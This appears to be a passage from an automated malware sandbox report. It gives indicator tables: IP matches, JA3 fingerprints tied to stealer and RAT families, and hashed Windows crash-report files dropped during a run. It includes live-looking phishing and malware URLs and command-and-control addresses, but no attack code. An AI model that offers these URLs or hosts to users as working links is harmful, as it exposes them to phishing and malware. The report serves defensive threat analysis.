	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	https://forms.office.com/r/Rv9K1pC66n	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=	Get hash	malicious	Unknown	Browse	104.16.117.116
	http://cache.netflix.com.sg5.wuush.us.kg/	Get hash	malicious	Unknown	Browse	172.67.179.201
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	104.21.72.96
AS-COLOCROSSINGUS	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	107.173.160.137
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	107.173.160.137
	jjjUC5ggb2nQMb1B6SvBkwmT.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	23.94.183.150
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133
AS-COLOCROSSINGUS	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	107.173.160.137
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	107.173.160.137
	jjjUC5ggb2nQMb1B6SvBkwmT.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	23.94.183.150
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a6c95ef2da5b759f65c60665167952ee	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
1138de370e523e824bbca92d049a3777	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	172.67.213.85
	https://busines-support-faceboock.cfd/contract/61558775282504	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://foodnetworkcookingprogramvontest.blogspot.com/?m=1	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/4e3ca076003281dc76236e73f1cc5142	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://www.linktr.ee/debank.notification	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://pancake-swap-alpha-mu.vercel.app/	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://49moleraur.xyz/garanti	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/e5ea942a18732b1311810dd2e55b146b/	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/17f299cc4b87de0e07a1fdc16d0d9e99/	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://pub-6647379952cc4cd3b00315a747c57534.r2.dev/hostyyzx.html	Get hash	malicious	Unknown	Browse	172.67.213.85
3b5074b1b5d032e5620f69f9f700ff0e	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16 31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	104.26.2.16 31.14.70.245
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	engine.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	invoker.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	tgmes.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	x.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	invoker.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	locker.ps1	Get hash	malicious	TrojanRansom	Browse	104.26.2.16 31.14.70.245
a0e9f5d64349fb13191bc781f81f42e1	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	github_softwares_v1.18.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	pn24_065.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\34CA.exe	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\2FBE.exe	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lm.exe_ed6b1a814e4ec1e6e89791b3995c66bc9bb83_5fe582ea_4585aa2b-09a4-4321-a029-216d7f5f1659\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0178270644678233
Encrypted:	false
SSDEEP:	192:LxT8V0BU/y3nj/kH6jzuiFuZ24IO8qbR:tT82BU/gj7zuiFuY4IO8g
MD5:	F67C9DE3FEFCCF52F64F682EC1EC7F90
SHA1:	FC4B061FEDA7FBF59F74920DEF68A9F1D9BEEAE8
SHA-256:	3714F1F866F898C65D4768A0F9FD1C09558E8E1FA439B27EE1252EFDA4C39E5E
SHA-512:	88B09FA145DEA7077C8AF455A0B57E5D512D4C8121C146BF418DB73E6A04AF9F3B9AC207F83AF9D9C29DA05DD3061166237C6FF1E226CA79FB4129C393672955
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.5.3.6.9.0.5.8.4.6.5.4.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.5.3.6.9.0.6.7.6.8.4.1.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.8.5.a.a.2.b.-.0.9.a.4.-.4.3.2.1.-.a.0.2.9.-.2.1.6.d.7.f.5.f.1.6.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.b.b.1.1.3.0.-.9.c.c.2.-.4.2.8.5.-.b.c.a.7.-.9.4.a.9.e.e.d.1.b.d.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.2.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.4.8.-.0.0.0.1.-.0.0.1.4.-.3.1.b.1.-.d.3.d.a.f.1.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.8.6.d.5.e.1.c.a.7.e.a.4.a.a.7.3.3.7.8.1.e.5.d.d.7.e.4.f.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.c.c.2.d.c.b.2.6.c.1.6.4.9.8.8.7.f.1.d.5.a.e.5.5.7.a.0.0.0.b.5.f.e.3.4.b.b.9.8.!.l.m...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vm.exe_12b9a62f7c411e90f74ee59af3dcf249dad3f7e8_19c5d0bb_5cda0b46-1c1f-4ec5-ad2f-eeb1ce6af232\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0577172080122477
Encrypted:	false
SSDEEP:	96:fH/FQu/nyaHqs+rToI7JfPQXIDcQvc6QcEVcw3cE/f+HbHgnoW6H8BrOyj55z9fx:3O85Ki0BU/4j7etlm7zuiFuZ24IO8qY
MD5:	3E505F06C3808D49379010CCC1CF6F28
SHA1:	E54B90319888788DA290DF76834D58A2699E98CD
SHA-256:	AA1C1585508630240CDE88DC1DF18048D66DB729294ACBC47D10B7495295442C
SHA-512:	B800B526787C3939D9403D4CF99C38D7E1542E1F7264491F0F27BCEC1E0451EC06D8EFBDCF84331D62BB08B70F206DBE279EB4A1EC79F92E4FFD71BC8CB466FC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.5.3.6.8.9.7.9.3.7.8.7.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.5.3.6.8.9.9.7.1.0.8.4.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.d.a.0.b.4.6.-.1.c.1.f.-.4.e.c.5.-.a.d.2.f.-.e.e.b.1.c.e.6.a.f.2.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.b.5.3.d.2.1.-.7.3.9.0.-.4.7.9.6.-.8.b.d.f.-.1.3.b.e.4.c.f.d.1.3.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.2.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.4.-.0.0.0.1.-.0.0.1.4.-.a.a.e.4.-.a.b.e.1.f.1.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.8.6.d.5.e.1.c.a.7.e.a.4.a.a.7.3.3.7.8.1.e.5.d.d.7.e.4.f.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.c.c.2.d.c.b.2.6.c.1.6.4.9.8.8.7.f.1.d.5.a.e.5.5.7.a.0.0.0.b.5.f.e.3.4.b.b.9.8.!.v.m...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA01C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jul 27 06:54:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	252723
Entropy (8bit):	3.6939030059514693
Encrypted:	false
SSDEEP:	3072:hlgSOc4uEqNyDrLTg1neqKDRFL4mfmV+Y:hNOc4syDvTgplKD0J
MD5:	0B2E061C4EE41C2444A389D4CA0F896D
SHA1:	7BB969820FCC1C62DACF6421F5D8071D6544198F
SHA-256:	C4DF3DC060AB223E26FCEBAD87514465DE96F4BBD428E667F69F753C06300E63
SHA-512:	8C82F5B79D7086C45292A33F7D78456D4717288A20FC1AB11D9196C550BDB1B636685E7201324776D1BEFC1B5DDACA2B72A1CD28F8246313FC9B55493869E75D
Malicious:	false
Preview:	MDMP..a..... .........f........................8................T..........T.......8...........T........... ,............... ..........."..............................................................................eJ......h#......GenuineIntel............T..............f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1C3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6316
Entropy (8bit):	3.723047844412853
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbi86pys5BYA1QE/OGZ5aM4Ux89b++sfpgKm:R6l7wVeJi86p75BYObprx89b++sfpgKm
MD5:	2C051AED9270222826C7FE37D0E44478
SHA1:	9B8F9BAC27C5962C9CD6C61094E87B9F56D2D3EC
SHA-256:	12732895FBC03402B59884FE42DEF2AE46603C43025228B32CB94A20DD72E1C7
SHA-512:	1625CB9CBED385D0F0BE0A3A2B286C43331C20DA0921E7D06D052DAE29AAA2C67D71D4C8A4FBF91BC08BBACF35E2EA1D6F4B77955CB9D23AE2EBCF8DF13A19E3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA241.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4646
Entropy (8bit):	4.469005732298993
Encrypted:	false
SSDEEP:	48:cvIwWl8zsjJg77aI9iFWpW8VYlPYm8M4JlD0qFE/Yo+q8t1oWyo43C/d:uIjf9I7k07V8SJlu2Nyo4S/d
MD5:	82B3DBD6D2FBB836246289BC07BC1B59
SHA1:	250AD2F0CEF4DEAE09854B6485DF3D4F35F628D1
SHA-256:	25A383126F1197E4B48071904E79170FE0ED550DF083328FDF876F25990FAD12
SHA-512:	EE5DB96081DECDA532AED04133F3ECAF6D52B3E62EAB141C431A02354FD2BA665F001F517AFE88640D1ED39871C690F7BCF92991045615E1F039B6411E219F1A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428997" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEEE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jul 27 06:55:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	139238
Entropy (8bit):	2.106632136083524
Encrypted:	false
SSDEEP:	384:t6vIj6rvmjfS1fGVUYz+7Vue9y91OQ4ZQesPH8qtNKal2BwID:L6CjfeQUYiJ02WEsnywID
MD5:	8FE2D67FBA58066B49B9B4E17EEE464F
SHA1:	5F71BFEA65B47C0A032525467928311ADE5E50F4
SHA-256:	E1AB74C51155A9BAC2F576FE5EDE025A254F41EFFC8852ED4F515B28428FBEE4
SHA-512:	5C9B722782802B9D05F6F9745348562640021BEAC79148B789EF30A0C46DAABB81DB5C5217B6C41B0C3FF14F4653A3F4C4BCAA6A686D214088E2267A82BF2A27
Malicious:	false
Preview:	MDMP..a..... .........f........................\|...........,...d"......T....[..........`.......8...........T............F...............#..........\|%..............................................................................eJ.......&......GenuineIntel............T.......H......f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0D4.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6332
Entropy (8bit):	3.724935474304215
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbIH6ZZHfX5eYeuQE/OGZ5aM4Ua89b0EsflXcm:R6l7wVeJIH6ZZHfQYXbpra89b0Esftcm
MD5:	9540485261B2A1D9206981702A04194B
SHA1:	3B72DEC2E4F2FED0D9D3DC145F4734389807D187
SHA-256:	AA6788447DF0A0FA1A739FBD64C6ED4900CA709D3A310EA4E8191C0E4B772841
SHA-512:	AB8FB83F060CF8756999612A0BAA46BDA43D2FB648E570EDE7F1498403F7FD275BD7D4257232761B89BF628E0F9E6D4F20ECF20AC429DCF0BB2BF908DB565047
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0F4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4646
Entropy (8bit):	4.46736611117368
Encrypted:	false
SSDEEP:	48:cvIwWl8zsjJg77aI9iFWpW8VYqYm8M4JFDD09hFdbj+q8v1RRU7yoO3c5d:uIjf9I7k07VyJteHkq7yoOM5d
MD5:	7AE6EB8806CA1212DFF40E2D40106D84
SHA1:	6C00247D8E793A2178AE3CFFAD78FDC8E9CB4FEC
SHA-256:	D46DAF8708B5701509CFE28FAB2D1119341A978A4BCA43F9CF79362F0101B760
SHA-512:	27DC047BC402498912421087233FC362DD728617FADF569DAD9FC767D0EB7B374734EF54CC7AB6EB7104A33D84DE9D4B4D73994B4BAF03EF9BADBF9D21920F68
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428997" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BD9E.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\BD9E.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1515
Entropy (8bit):	5.3602768626210215
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNXE4ZR:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	366F3274873188864F1C9DC2A155FE99
SHA1:	DC6D430ADC2BF68980D60D32832F937A19002970
SHA-256:	942877BF38C3575135E9008E3C2880D64ED5D43E32F125E05DD4D969357EB92F
SHA-512:	1146FD3F3661BF222A48E0C51909C64A57B322556D8C43DDCEB2CF7A3F07F99B7AECC843211B3598643EF447D651873BA13AD335FB74004CE3B51F8F98C22156
Malicious:	false
